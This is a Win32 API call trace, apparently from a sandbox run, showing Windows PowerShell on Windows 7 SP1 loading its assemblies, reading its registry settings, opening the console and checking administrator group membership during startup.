	[0615.810] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcac14, puLen=0x26dcb0) returned 1
	[0615.810] lstrlenW (lpString="System.Management.Automation") returned 28
	[0615.810] CoTaskMemAlloc (cb=0x3c) returned 0x452fc0
	[0615.810] lstrcpyW (in: lpString1=0x452fc0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0615.810] CoTaskMemFree (pv=0x452fc0) 
	[0615.810] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcac70, puLen=0x26dcb0) returned 1
	[0615.810] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0615.810] CoTaskMemAlloc (cb=0x20) returned 0x450130
	[0615.810] lstrcpyW (in: lpString1=0x450130, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0615.810] CoTaskMemFree (pv=0x450130) 
	[0615.810] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcacb0, puLen=0x26dcb0) returned 1
	[0615.810] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0615.810] CoTaskMemAlloc (cb=0x44) returned 0x452fc0
	[0615.810] lstrcpyW (in: lpString1=0x452fc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0615.810] CoTaskMemFree (pv=0x452fc0) 
	[0615.810] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcad18, puLen=0x26dcb0) returned 1
	[0615.810] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0615.810] CoTaskMemAlloc (cb=0x76) returned 0x3f0f20
	[0615.811] lstrcpyW (in: lpString1=0x3f0f20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0615.811] CoTaskMemFree (pv=0x3f0f20) 
	[0615.811] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcadb4, puLen=0x26dcb0) returned 1
	[0615.811] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0615.811] CoTaskMemAlloc (cb=0x44) returned 0x452fc0
	[0615.811] lstrcpyW (in: lpString1=0x452fc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0615.811] CoTaskMemFree (pv=0x452fc0) 
	[0615.811] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcae18, puLen=0x26dcb0) returned 1
	[0615.811] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0615.811] CoTaskMemAlloc (cb=0x58) returned 0x3bb280
	[0615.811] lstrcpyW (in: lpString1=0x3bb280, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0615.811] CoTaskMemFree (pv=0x3bb280) 
	[0615.811] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcae94, puLen=0x26dcb0) returned 1
	[0615.811] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0615.811] CoTaskMemAlloc (cb=0x20) returned 0x450130
	[0615.812] lstrcpyW (in: lpString1=0x450130, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0615.812] CoTaskMemFree (pv=0x450130) 
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x2bcab3c, puLen=0x26dcb0) returned 1
	[0615.812] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0615.812] CoTaskMemAlloc (cb=0x66) returned 0x3c1240
	[0615.812] lstrcpyW (in: lpString1=0x3c1240, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0615.812] CoTaskMemFree (pv=0x3c1240) 
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x0, puLen=0x26dcb0) returned 0
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x0, puLen=0x26dcb0) returned 0
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dcb8, puLen=0x26dcb0 | out: lplpBuffer=0x26dcb8*=0x0, puLen=0x26dcb0) returned 0
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dc88, puLen=0x26dc80 | out: lplpBuffer=0x26dc88*=0x2bcaae4, puLen=0x26dc80) returned 1
	[0615.812] CoTaskMemAlloc (cb=0x204) returned 0x446bf0
	[0615.812] VerLanguageNameW (in: wLang=0x0, szLang=0x446bf0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0615.812] CoTaskMemFree (pv=0x446bf0) 
	[0615.812] VerQueryValueW (in: pBlock=0x2bcaa48, lpSubBlock="\\", lplpBuffer=0x26dcd8, puLen=0x26dcd0 | out: lplpBuffer=0x26dcd8*=0x2bcaa70, puLen=0x26dcd0) returned 1
	[0615.821] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0615.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.821] CoTaskMemFree (pv=0x4444f0) 
	[0615.826] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0615.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.826] CoTaskMemFree (pv=0x4444f0) 
	[0616.346] lstrlenW (lpString="䅁") returned 1
	[0616.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dba8 | out: phkResult=0x26dba8*=0x304) returned 0x0
	[0616.358] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26db98 | out: phkResult=0x26db98*=0x308) returned 0x0
	[0616.358] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dc28 | out: phkResult=0x26dc28*=0x30c) returned 0x0
	[0616.363] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26db6c, lpData=0x0, lpcbData=0x26db68*=0x0 | out: lpType=0x26db6c*=0x1, lpData=0x0, lpcbData=0x26db68*=0x56) returned 0x0
	[0616.364] CoTaskMemAlloc (cb=0x5a) returned 0x44ecf0
	[0616.364] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26db3c, lpData=0x44ecf0, lpcbData=0x26db38*=0x56 | out: lpType=0x26db3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26db38*=0x56) returned 0x0
	[0616.364] CoTaskMemFree (pv=0x44ecf0) 
	[0616.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.059] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0617.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.059] CoTaskMemFree (pv=0x4444f0) 
	[0621.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0621.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0623.095] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0623.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.095] CoTaskMemFree (pv=0x444600) 
	[0623.096] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0623.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.097] CoTaskMemFree (pv=0x444600) 
	[0624.097] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0624.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.097] CoTaskMemFree (pv=0x444600) 
	[0624.099] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0624.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.099] CoTaskMemFree (pv=0x444600) 
	[0624.099] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0624.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.100] CoTaskMemFree (pv=0x444600) 
	[0626.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0626.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0627.883] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0627.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.883] CoTaskMemFree (pv=0x444600) 
	[0627.886] CoTaskMemAlloc (cb=0x104) returned 0x444600
	[0627.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.887] CoTaskMemFree (pv=0x444600) 
	[0628.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0644.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0644.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0646.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0646.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0653.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0653.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0656.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0656.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0658.497] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0658.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.498] CoTaskMemFree (pv=0x444820) 
	[0658.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0658.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0658.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0660.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0660.320] SetErrorMode (uMode=0x1) returned 0x1
	[0660.320] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26db00 | out: lpFileInformation=0x26db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0660.320] SetErrorMode (uMode=0x1) returned 0x1
	[0670.508] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.508] CoTaskMemFree (pv=0x444820) 
	[0670.509] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.510] CoTaskMemFree (pv=0x444820) 
	[0670.510] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.510] CoTaskMemFree (pv=0x444820) 
	[0670.512] CoCreateGuid (in: pguid=0x26dec8 | out: pguid=0x26dec8*(Data1=0x1019986d, Data2=0xbf5c, Data3=0x4812, Data4=([0]=0xba, [1]=0xb8, [2]=0x6a, [3]=0xc2, [4]=0xc8, [5]=0x65, [6]=0x0, [7]=0xcd))) returned 0x0
	[0670.515] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.515] CoTaskMemFree (pv=0x444820) 
	[0670.518] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.518] CoTaskMemFree (pv=0x444820) 
	[0670.521] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0670.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.521] CoTaskMemFree (pv=0x444820) 
	[0670.535] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0672.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26db70 | out: lpConsoleScreenBufferInfo=0x26db70) returned 1
	[0672.130] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0672.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26db70 | out: lpConsoleScreenBufferInfo=0x26db70) returned 1
	[0672.131] GetVersionExW (in: lpVersionInformation=0x26db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0672.134] GetCurrentProcess () returned 0xffffffffffffffff
	[0672.135] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26db98 | out: TokenHandle=0x26db98*=0x308) returned 1
	[0672.139] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26dab8 | out: TokenInformation=0x0, ReturnLength=0x26dab8) returned 0
	[0672.140] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b7360
	[0672.140] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x3b7360, TokenInformationLength=0x4, ReturnLength=0x26dab8 | out: TokenInformation=0x3b7360, ReturnLength=0x26dab8) returned 1
	[0672.142] DuplicateTokenEx (in: hExistingToken=0x308, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26dc18 | out: phNewToken=0x26dc18*=0x1cc) returned 1
	[0672.142] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26dab8 | out: TokenInformation=0x0, ReturnLength=0x26dab8) returned 0
	[0672.142] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b7310
	[0672.142] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x3b7310, TokenInformationLength=0x4, ReturnLength=0x26dab8 | out: TokenInformation=0x3b7310, ReturnLength=0x26dab8) returned 1
	[0672.143] CheckTokenMembership (in: TokenHandle=0x1cc, SidToCheck=0x2bde738*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26dc28 | out: IsMember=0x26dc28) returned 1
	[0672.143] CloseHandle (hObject=0x1cc) returned 1
	[0672.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0672.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0673.621] CoTaskMemAlloc (cb=0x804) returned 0x1b87f880
